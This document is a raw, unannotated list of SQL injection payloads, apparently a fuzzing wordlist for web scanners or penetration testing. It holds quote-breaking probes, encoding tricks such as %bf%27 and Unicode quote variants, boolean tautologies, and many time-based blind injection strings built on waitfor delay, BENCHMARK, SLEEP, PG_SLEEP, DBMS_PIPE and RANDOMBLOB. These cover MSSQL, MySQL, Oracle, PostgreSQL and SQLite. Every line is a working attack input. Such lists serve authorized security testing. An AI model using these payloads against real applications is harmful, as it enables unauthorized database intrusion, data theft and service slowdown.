'
%27
"
%22
#
%23
;
%3B
)
*
%bf%27
&apos;
\u02BA
%CA%BA
\u0022
\u02B9
%CA%B9
\u0027
`+WsXeDC
'+WsXeDC
"+WsXeDC
'||'WsXeDC
"||"WsXeDC
'+'WsXeDC
' 'WsXeDC
'%20'WsXeDC
'%2B'WsXeDC
or 'WsXeDC'='WsXeDC
and 'WsXeDC'='null
"+"WsXeDC
" "WsXeDC
"%20"WsXeDC
"%2B"WsXeDC
or "WsXeDC"="WsXeDC
and "WsXeDC"="null
or 987=987
and 987=789
%bf%27/**/or/**/1=1/**/%23
%bf%27/**/or/**/1=2/**/%23
1;waitfor delay '0:0:15'--
1);waitfor delay '0:0:15'--
1';waitfor delay '0:0:15'--
1";waitfor delay '0:0:15'--
1');waitfor delay '0:0:15'--
1");waitfor delay '0:0:15'--
1));waitfor delay '0:0:15'--
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
AND 25234=BENCHMARK(1000000,MD5('wsxedc'))
' AND 25234=BENCHMARK(1000000,MD5('wsxedc'))
" AND 25234=BENCHMARK(1000000,MD5("wsxedc"))
RLIKE SLEEP(30)
OR ELT(1500=1500,SLEEP(15))
' OR ELT(1500=1500,SLEEP(15)) OR 'ARV'='ARV
" OR ELT(1500=1500,SLEEP(15)) OR "ARV"="ARV
 AND sleep(15)--
' AND sleep(15)--
" AND sleep(15)--
 AND sleep(15) AND 'arv'='arv
'  AND sleep(15) AND 'arv'='arv
"  AND sleep(15) AND "arv"="arv
AND 1500=DBMS_PIPE.RECEIVE_MESSAGE('asdf',15) 
' AND 1500=DBMS_PIPE.RECEIVE_MESSAGE('asdf',15) 
" AND 1500=DBMS_PIPE.RECEIVE_MESSAGE("asdf",15) 
AND 1239=(SELECT 1239 FROM PG_SLEEP(15))
AND 1239=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
' AND 1239=(SELECT 1239 FROM PG_SLEEP(15)) and 'arv'='arv
" AND 1239=(SELECT 1239 FROM PG_SLEEP(15)) and "arv"="arv
' AND 1239=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))  and 'arv'='arv
" AND 1239=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))  and "arv"="arv
AND 1239=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(123900000000/2))))
' AND 1239=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(123900000000/2))))  and 'arv'='arv
" AND 1239=LIKE("ABCDEFG",UPPER(HEX(RANDOMBLOB(123900000000/2))))  and "arv"="arv
sleep(15)#
1 or sleep(15)#
" or sleep(15)#
' or sleep(15)#
" or sleep(15)="
' or sleep(15)='
1) or sleep(15)#
") or sleep(15)="
') or sleep(15)='
1)) or sleep(15)#
")) or sleep(15)="
')) or sleep(15)='
1/**/or/**/sleep(15)#
"/**/or/**/sleep(15)#
'/**/or/**/sleep(15)#
"/**/or/**/sleep(15)="
'/**/or/**/sleep(15)='
1)/**/or/**/sleep(15)#
")/**/or/**/sleep(15)="
')/**/or/**/sleep(15)='
1))/**/or/**/sleep(15)#
"))/**/or/**/sleep(15)="
'))/**/or/**/sleep(15)='
%bf%27
;waitfor delay '0:0:15'--
);waitfor delay '0:0:15'--
';waitfor delay '0:0:15'--
%bf%27;waitfor delay '0:0:15'--
";waitfor delay '0:0:15'--
');waitfor delay '0:0:15'--
%bf%27);waitfor delay '0:0:15'--
");waitfor delay '0:0:15'--
));waitfor delay '0:0:15'--
'));waitfor delay '0:0:15'--
%bf%27));waitfor delay '0:0:15'--
"));waitfor delay '0:0:15'--
benchmark(100000000,SHA(1))#
1 or benchmark(100000000,SHA(1)))#
" or benchmark(100000000,SHA(1))#
" or 1=1-benchmark(100000000,SHA(1)) or "a"="a
' or benchmark(100000000,SHA(1))#
' or 1=1-benchmark(100000000,SHA(1)) or 'a'='a
%bf%27 or benchmark(100000000,SHA(1))#
%bf%27 or 1=1-benchmark(100000000,SHA(1)) or %bf%27a%bf%27=%bf%27a
1) or benchmark(100000000,SHA(1))#
") or benchmark(100000000,SHA(1))#
') or benchmark(100000000,SHA(1))#
%bf%27) or benchmark(100000000,SHA(1))#
1)) or benchmark(100000000,SHA(1))#
")) or benchmark(100000000,SHA(1))#
')) or benchmark(100000000,SHA(1))#
%bf%27)) or benchmark(100000000,SHA(1))#
benchmark(100000000,SHA(1))#
1/**/or/**/benchmark(100000000,SHA(1)))#
"/**/or/**/benchmark(100000000,SHA(1))#
"/**/or/**/1=1-benchmark(100000000,SHA(1))/**/or/**/"a"="a
'/**/or/**/benchmark(100000000,SHA(1))#
'/**/or/**/1=1-benchmark(100000000,SHA(1))/**/or/**/'a'='a
%bf%27/**/or/**/benchmark(100000000,SHA(1))#
%bf%27/**/or/**/1=1-benchmark(100000000,SHA(1))/**/or/**/%bf%27a%bf%27=%bf%27a
1)/**/or/**/benchmark(100000000,SHA(1))#
")/**/or/**/benchmark(100000000,SHA(1))#
')/**/or/**/benchmark(100000000,SHA(1))#
%bf%27)/**/or/**/benchmark(100000000,SHA(1))#
1))/**/or/**/benchmark(100000000,SHA(1))#
"))/**/or/**/benchmark(100000000,SHA(1))#
'))/**/or/**/benchmark(100000000,SHA(1))#
%bf%27))/**/or/**/benchmark(100000000,SHA(1))#
"/**/or/**/1=1-benchmark(100000000,SHA(1))/**/or/**/"a"="a
pg_sleep(15)--
1 or pg_sleep(15)--
" or pg_sleep(15)--
' or pg_sleep(15)--
%bf%27 or pg_sleep(15)--
1) or pg_sleep(15)--
") or pg_sleep(15)--
') or pg_sleep(15)--
%bf%27) or pg_sleep(15)--
1)) or pg_sleep(15)--
")) or pg_sleep(15)--
')) or pg_sleep(15)--
%bf%27)) or pg_sleep(15)--
1; SELECT pg_sleep(10);
